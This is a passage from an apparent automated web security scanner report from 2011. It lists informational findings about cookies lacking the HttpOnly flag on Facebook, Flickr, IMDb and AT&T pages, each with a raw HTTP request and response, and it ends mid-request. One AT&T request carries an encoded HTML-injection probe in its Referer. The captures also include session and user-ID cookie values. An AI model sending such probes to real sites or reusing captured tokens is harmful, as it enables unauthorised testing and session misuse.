Host:   http://www.facebook.com
Path:   /home.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /home.php? HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://ia.media-imdb.com/images/M/MV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg@@._V1_.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; datr=pG8pTrLcOF5vWXJLyEMRGq7p

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=yxUAz; path=/; domain=.facebook.com
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fhome.php; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.52.34
X-Cnection: close
Date: Mon, 15 Aug 2011 18:24:15 GMT
Content-Length: 0


8.94. http://www.facebook.com/login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /login.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://ia.media-imdb.com/images/M/MV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg@@._V1_.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; datr=pG8pTrLcOF5vWXJLyEMRGq7p; lsd=yxUAz; next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; next_path=%2Fhome.php

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=pG8pTrLcOF5vWXJLyEMRGq7p; expires=Wed, 14-Aug-2013 18:26:50 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: rdir=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.228.27
X-Cnection: close
Date: Mon, 15 Aug 2011 18:26:50 GMT
Content-Length: 17097

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/login.php";window._EagleEyeSeed="27lC";</script><noscript
...[SNIP]...

8.95. http://www.facebook.com/media/set/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /media/set/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/set/?set=a.206519616063696.51681.146642365384755 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ConanTheBarbarian?sk=photos
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FConanTheBarbarian%3Fsk%3Dphotos; wd=1123x954; x-src=%2Fmedia%2Fset%2F%7Cpagelet_photo_albums; act=1313433588181%2F1; _e_mTli_0=%5B%22mTli%22%2C1313433588184%2C%22act%22%2C1313433588181%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.206519616063696.51681.146642365384755%22%2C%22click%22%2C%22click%22%2C%22photo_albums%22%2C%22r%22%2C%22%2F%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C328%2C584%2C63%2C981%2C16%5D

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: rdir=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.206519616063696.51681.146642365384755; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: x-src=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.237.31
X-Cnection: close
Date: Mon, 15 Aug 2011 18:38:52 GMT
Content-Length: 172809

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/media\/set\/index.php";window._EagleEyeSeed="QNCv";</scri
...[SNIP]...

8.96. http://www.flickr.com/flanal_event.gne  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /flanal_event.gne

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /flanal_event.gne?target=flickr.soup.abandon&title=Abandonment&rand=0.05619151331484318 HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.flickr.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=0fa0umh741480&b=3&s=sk; localization=en-us%3Bus%3Bus

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:18:28 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Mon, 12-Aug-2013 18:18:28 GMT; path=/; domain=.flickr.com
Cache-Control: private
X-Served-By: www70.flickr.mud.yahoo.com
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 1
Via: HTTP/1.1 r09.ycpi.ne1.yahoo.net (YahooTrafficServer/1.20.4 [cMsSf ]), HTTP/1.1 r03.ycpi.lax.yahoo.net (YahooTrafficServer/1.20.4 [cMsSf ])
Server: YTS/1.20.4
Proxy-Connection: keep-alive
Content-Length: 0


8.97. http://www.imdb.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imdb.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.imdb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session-id=566-3426531-3253648; session-id-time=1471106531; uu=BCYi7R4nLigv6I99LFBjSIAuEddX-KoeNGrGwEyY3WLQG62GqVCzq3wtfNa--fIIlQS89mwCuhGENBF4itU92DAVM_GAGwBP5lNi1BDuS0a5lpoVlWYteWxx3KI0-4AEyUS59gqLYZTSDynEXEgu3CGNTBK5Onalb_6-mCZkE0o80JAHzCmRzqHGO53KGIQd_37YoDNPUPJK052tfjxJd7T6ueGjV3HdByAliaGCLnQJsgzuhhgsVYxeGebYAciXWo3ZULP-6AeTuOIASfVQ0SYYgu6pk8iC7JncA19rxzzNZj1ceE9keGergJpspPQ8PR_O; cs=9FHDartxepMs4zicyTf0jAhZEiSO2SRj2v5SJImOITet6mUy+I4ChC7ZEhO2mZq0jYqRVA3qUQfuegEXntkSFCmZUgSO2SSyblESJI7vJDOO2RIkjvkSJI7ZEmTOiWIUg=; __utma=168836921.779117687.1313426596.1313426596.1313426596.1; __utmz=168836921.1313426596.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); us=s%3D1009%3Bs%3D32%3Bs%3Dc5%3Bs%3Dc4%3Bs%3Dc4%3Bs%3Dc1%3Bs%3Dc17%3Bs%3Dc12%3B

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:23:53 GMT
Server: Server
Cache-Control: private
Cneonction: close
Content-Type: text/html
Set-Cookie: cs=gIlM8TPFrbxqJMVtH7h0awfH7bqgkW2M5Pd5qqOiCL0Gxn0a0JFtjZjx5Qqj8l6KI6IuiYAyfomwkW2KB9EtmqCRWyxAGW26oKdbraCRbbqgsW26oJFt+uDBHYqg==;expires=Tue, 16 Aug 2011 07:00:00 GMT;path=/;domain=.imdb.com
P3P: policyref="http://i.imdb.com/images/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Vary: User-Agent
Content-Length: 79391


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/20
...[SNIP]...

8.98. http://www.imdb.com/tv/widget/grid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imdb.com
Path:   /tv/widget/grid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tv/widget/grid?context=rhs_tv_widget&show_episode=1 HTTP/1.1
Host: www.imdb.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session-id=566-3426531-3253648; session-id-time=1471106531; uu=BCYi7R4nLigv6I99LFBjSIAuEddX-KoeNGrGwEyY3WLQG62GqVCzq3wtfNa--fIIlQS89mwCuhGENBF4itU92DAVM_GAGwBP5lNi1BDuS0a5lpoVlWYteWxx3KI0-4AEyUS59gqLYZTSDynEXEgu3CGNTBK5Onalb_6-mCZkE0o80JAHzCmRzqHGO53KGIQd_37YoDNPUPJK052tfjxJd7T6ueGjV3HdByAliaGCLnQJsgzuhhgsVYxeGebYAciXWo3ZULP-6AeTuOIASfVQ0SYYgu6pk8iC7JncA19rxzzNZj1ceE9keGergJpspPQ8PR_O; __utma=168836921.779117687.1313426596.1313426596.1313426596.1; __utmz=168836921.1313426596.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cs=Hmt+tyNJuDdEdOWWQN1wNAbGfbqgkW2NmMHlGqPyXoojoi6JgDJ+ibCRbYoGES2aoJFb/fPXTbqjhMntt9HNyTCRWyxAGW26oKdbraCRbbqgsW26oJFt+uDBHYqg==; us=s%3D1009%3Bs%3D32%3Bs%3Dc5%3Bs%3Dc4%3Bs%3Dc17%3Bs%3Dc4%3Bs%3Dc12%3Bs%3Dc1%3B

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:24:02 GMT
Server: Server
Cache-Control: private
Cneonction: close
Content-Type: text/html
Set-Cookie: cs=FJ6+Vfy70D/Z45zlX+GrcwiOAiSO2RITtqma5I26UQQN6lEXrnoBF57ZEhQoWVIEjtkkY9oeAiSISmaH3b/xMimZspfO2SSyblESJI7vJDOO2RIkjvkSJI7ZEmTOiWIUg=;expires=Tue, 16 Aug 2011 07:00:00 GMT;path=/;domain=.imdb.com
P3P: policyref="http://i.imdb.com/images/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Vary: User-Agent
Content-Length: 6412

<a name="grid_start" id="grid_start" ref="2011-08-15/2000/Mon. Aug. 15"></a>
<div class="tv_grid">
<div class="tv_channels">
<div id="row_0" onmouseover="if (typeof(imdb_tv_widget_init)!='undefined'){
...[SNIP]...

8.99. http://www.wireless.att.com//store_maintenance/images/att_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   //store_maintenance/images/att_logo.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET //store_maintenance/images/att_logo.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.wireless.att.com
Cookie: DL3K=3_qhKQM4yElO69ddjfeyjVrK9h8w0Y7a0dATxb_LpGntZyBg59oJM8Q

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 39777
Expires: Mon, 15 Aug 2011 18:19:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:19:48 GMT
Connection: close
Set-Cookie: TLTHID=28BC740AC76B10C7B9C9ECC55DAD188B; Path=/; Domain=.att.com
Set-Cookie: TLTSID=28BC740AC76B10C7B9C9ECC55DAD188B; Path=/; Domain=.att.com
Set-Cookie: TLTUID=28BC740AC76B10C7B9C9ECC55DAD188B; Path=/; Domain=.att.com; Expires=Mon, 15-08-2021 18:19:47 GMT
Set-Cookie: B2CSESSIONID=4yhhTJjGBGsT1P!-1971079613; path=/; HttpOnly
Set-Cookie: DYN_USER_ID=4148125079; path=/
Set-Cookie: DYN_USER_CONFIRM=87ae6569527485e2ef6fe38d1e50f6d7; path=/
Set-Cookie: ECOM_GTM=NA_osbth; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: cust_type=new; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: browserid=A001701562944; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: svariants=NA; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: BIGipServerpWL_7010_7011=2698105223.25115.0000; path=/


                                                                                   
...[SNIP]...

8.100. http://www.wireless.att.com//store_maintenance/images/globemaintenance.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   //store_maintenance/images/globemaintenance.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET //store_maintenance/images/globemaintenance.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.wireless.att.com
Cookie: DL3K=3_qhKQM4yElO69ddjfeyjVrK9h8w0Y7a0dATxb_LpGntZyBg59oJM8Q

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 39776
Expires: Mon, 15 Aug 2011 18:19:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:19:48 GMT
Connection: close
Set-Cookie: TLTHID=28BDD084C76B10C7C61EE201AC744794; Path=/; Domain=.att.com
Set-Cookie: TLTSID=28BDD084C76B10C7C61EE201AC744794; Path=/; Domain=.att.com
Set-Cookie: TLTUID=28BDD084C76B10C7C61EE201AC744794; Path=/; Domain=.att.com; Expires=Mon, 15-08-2021 18:19:48 GMT
Set-Cookie: B2CSESSIONID=B2MBTJjGtWy6KS!-566915523; path=/; HttpOnly
Set-Cookie: DYN_USER_ID=4147529977; path=/
Set-Cookie: DYN_USER_CONFIRM=737fa50353da42a460976241e383a475; path=/
Set-Cookie: ECOM_GTM=NA_osbth; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: cust_type=new; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: browserid=A001701156621; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: svariants=NA; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: BIGipServerpWL_7010_7011=2362560903.25115.0000; path=/


                                                                                   
...[SNIP]...

8.101. http://www.wireless.att.com//store_maintenance/images/page_midSlice.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   //store_maintenance/images/page_midSlice.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET //store_maintenance/images/page_midSlice.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.wireless.att.com
Cookie: DL3K=3_qhKQM4yElO69ddjfeyjVrK9h8w0Y7a0dATxb_LpGntZyBg59oJM8Q

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 39776
Expires: Mon, 15 Aug 2011 18:19:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:19:48 GMT
Connection: close
Set-Cookie: TLTHID=28BC73E2C76B10C7BB9884E21E28C099; Path=/; Domain=.att.com
Set-Cookie: TLTSID=28BC73E2C76B10C7BB9884E21E28C099; Path=/; Domain=.att.com
Set-Cookie: TLTUID=28BC73E2C76B10C7BB9884E21E28C099; Path=/; Domain=.att.com; Expires=Mon, 15-08-2021 18:19:47 GMT
Set-Cookie: B2CSESSIONID=Jb5MTJjGsjzqYV!-163879780; path=/; HttpOnly
Set-Cookie: DYN_USER_ID=4148610579; path=/
Set-Cookie: DYN_USER_CONFIRM=d2640787f3179c32006432f0f80a2953; path=/
Set-Cookie: ECOM_GTM=NA_osbth; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: cust_type=new; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: browserid=A001701106939; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: svariants=NA; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: BIGipServerpWL_7010_7011=4090614151.25115.0000; path=/


                                                                                   
...[SNIP]...

8.102. http://www.wireless.att.com//store_maintenance/images/page_topSlice.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   //store_maintenance/images/page_topSlice.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET //store_maintenance/images/page_topSlice.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.wireless.att.com
Cookie: DL3K=3_qhKQM4yElO69ddjfeyjVrK9h8w0Y7a0dATxb_LpGntZyBg59oJM8Q

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 39776
Expires: Mon, 15 Aug 2011 18:19:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:19:48 GMT
Connection: close
Set-Cookie: TLTHID=290B5B38C76B10C7C25EEBB678C99402; Path=/; Domain=.att.com
Set-Cookie: TLTSID=290B5B38C76B10C7C25EEBB678C99402; Path=/; Domain=.att.com
Set-Cookie: TLTUID=290B5B38C76B10C7C25EEBB678C99402; Path=/; Domain=.att.com; Expires=Mon, 15-08-2021 18:19:48 GMT
Set-Cookie: B2CSESSIONID=YZJWTJjGNKsYDb!1152165740; path=/; HttpOnly
Set-Cookie: DYN_USER_ID=4148392036; path=/
Set-Cookie: DYN_USER_CONFIRM=23349739d9c6714e801b70cc5c02b78d; path=/
Set-Cookie: ECOM_GTM=NA_osbth; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: cust_type=new; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: browserid=A001701691293; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: svariants=NA; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: BIGipServerpWL_7010_7011=3520188807.25115.0000; path=/


                                                                                   
...[SNIP]...

8.103. http://www.wireless.att.com/cell-phone-service/legal/return-policy.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   /cell-phone-service/legal/return-policy.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cell-phone-service/legal/return-policy.jsp HTTP/1.1
Host: www.wireless.att.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp?source=ECWD000000000000O90d55%3E%3Ca%20b%3dc%3E17435fcd4f5
Cookie: TLTUID=7284D2A8C16210C1695BC3E02554C7F2; ECOM_GTM=NA_osbth; cust_type=new; browserid=A001693504923; svariants=NA; DL3K=3_fK9L_XmvTCv3Jaj9415jcvofrDw_j4lng7oxa5Rw6yNCKjvqChmkg; 00d78e1f-01f0-45cd-9f9c-79e690335b05=%7B%22parent_id%22%3A%22kwkf9w9SRba%22%2C%22referrer%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22id%22%3A%22uo_OgfisI0f%22%2C%22wom%22%3Atrue%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fcell-phones%2Fcell-phones.jsp%3Ffeacondition%3Dallphones%26feaavailable%3Dallphones%26feapaytype%3Dstandard%26startFilter%3Dfalse%26allTypes%3Don%26osWindows%2520Phone%3D100012%26allManus%3Don%26source%3DECWD000000000000O%23fbid%253Dkwkf9w9SRba%26migAtlSA%3D341465538%26migAtlC%3D480d7815-42e6-4315-a737-64cdf14f8adc%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; bn_u=6923670900791695274; __utma=52846072.1104250127.1312768993.1312768993.1312768993.1; __utmz=52846072.1312768993.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=241758596.1378329856.1312769231.1312769231.1313431966.2; __utmz=241758596.1313431966.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=241758596.3.10.1313431966; TLTHID=8102671EC76B10C7BC7DF17E7E199B90; TLTSID=31A640C8C76B10C7A09DCAEB2DFC8A0E; B2CSESSIONID=1fKdTJjTTvqPt1!1142544054; DYN_USER_ID=4148005476; DYN_USER_CONFIRM=d958665c301d296eb3ee49e91430ee35; BIGipServerpWL_7010_7011=3989950855.25115.0000; wtAka=y; 